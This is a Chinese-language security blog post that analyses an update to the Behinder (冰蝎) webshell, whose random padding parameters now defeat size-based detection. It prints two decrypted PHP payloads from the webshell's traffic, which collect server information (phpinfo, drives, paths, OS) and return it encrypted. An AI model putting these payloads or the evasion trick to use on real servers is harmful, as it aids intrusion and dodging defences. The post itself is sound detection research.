冰蝎 Behinder_v3.0 Beta 3 重点更新简析

发表于 |

17日刚分析出特征:冰蝎v3.0 Beta 2(Behinder_v3.0 Beta 2)Webshell分析与检测

19号就迅速更新了,下面是更新日志:

1
2
3
4
5
6
7
8
9
10
11
12
13
###2020.8.18 v3.0 Beta 3 更新日志

1.增加了端口映射功能的稳定性;
2.Java服务端支持Java6+;
3.修复了PHP版本连接不上的问题,PHP版本支持为PHP5.3~PHP7.4;
4.修复了aspx连接不上的问题;
5.修复了asp版本无法连接的问题;
6.请求体增加了随机冗余参数,避免防护设备通过请求体大小识别请求;
7.更新了内置的UesrAgent列表;
8.修复了请求体中cookie值携带cookie属性的问题;
9.修该了Accept请求头;
10.修复了某些环境下无法列目录的问题;
11.修复了文件无法打开的问题。

重点是第6个,请求体增加了随机冗余参数,避免防护设备通过请求体大小识别请求;

之前可以通过长度来检测,现在就不行了

我们看看是怎么实现的,通过在shell.php解密,得到

第一次本来的加密UUID,现在变成随机的了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
@error_reporting(0);
function main($content)
{
        $result = array();
        $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    $key = $_SESSION['k'];
    echo encrypt(json_encode($result),$key);
}

function encrypt($data,$key)
{
        if(!extension_loaded('openssl'))
            {
                    for($i=0;$i<strlen($data);$i++) {
                             $data[$i] = $data[$i]^$key[$i+1&15]; 
                            }
                        return $data;
            }
    else
            {
                    return openssl_encrypt($data, "AES128", $key);
            }
}$content="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";
main($content);

第二次是调用获取基本信息,代码本来是固定的,但是加了一个随机参数,当然这个参数不会在函数中用的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
error_reporting(0);
function main($whatever) {
    ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean();
    $driveList ="";
    if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))
    {
        for($i=65;$i<=90;$i++)
    	{
    		$drive=chr($i).':/';
    		file_exists($drive) ? $driveList=$driveList.$drive.";":'';
    	}
    }
	else
	{
		$driveList="/";
	}
    $currentPath=getcwd();
    //echo "phpinfo=".$info."\n"."currentPath=".$currentPath."\n"."driveList=".$driveList;
    $osInfo=PHP_OS;
    $result=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo));
    //echo json_encode($result);
    session_start();
    $key=$_SESSION['k'];
    //echo json_encode($result);
    //echo openssl_encrypt(json_encode($result), "AES128", $key);
    echo encrypt(json_encode($result), $key);
}

function encrypt($data,$key)
{
	if(!extension_loaded('openssl'))
    	{
    		for($i=0;$i<strlen($data);$i++) {
    			 $data[$i] = $data[$i]^$key[$i+1&15]; 
    			}
			return $data;
    	}
    else
    	{
    		return openssl_encrypt($data, "AES128", $key);
    	}
}$whatever="7MgESJ8WA7onT3DlRntO54FQCVviYt5ed7j16Op1Tlda5mtXGgngNkfLWmf8JGkK5zNzMVABGM2tWlKglVg8aOlVkKxESfnEbN7M9u7mKK9hxIiJ0hoyOe1muWuCKdsGF4AnEqu2fC1rtXszlhW4uJeuQMulzXGOWNdxOJmzVv71VI4ZoWezGr2ci6gKAIEWBYcMKth8GqhE47mrQjHI59JoK53P6ckDwWHBDbRo6gXPHnxbGbyO3hwMWbr9MEEZ6OCntxJQClMgn8Sl";
main($whatever);

那么这样就导致我们之前的强特征直接消失了

暂时还没找到非常精准的特征去检测,攻防对抗真激烈啊

常规的字符串匹配,正则,应该很难检测了

我没怎么接触机器学习,不知道能否应用到这里,感觉应该是可以的,机器学习可以解决分类问题

毕竟这是一个全程base64加密,解密后都是不可见字符,返回包也是。

打赏专区
paypal: https://www.paypal.me/giantbranch
假如你看不到评论,可能是你访问Disqus被墙了,请使用代理访问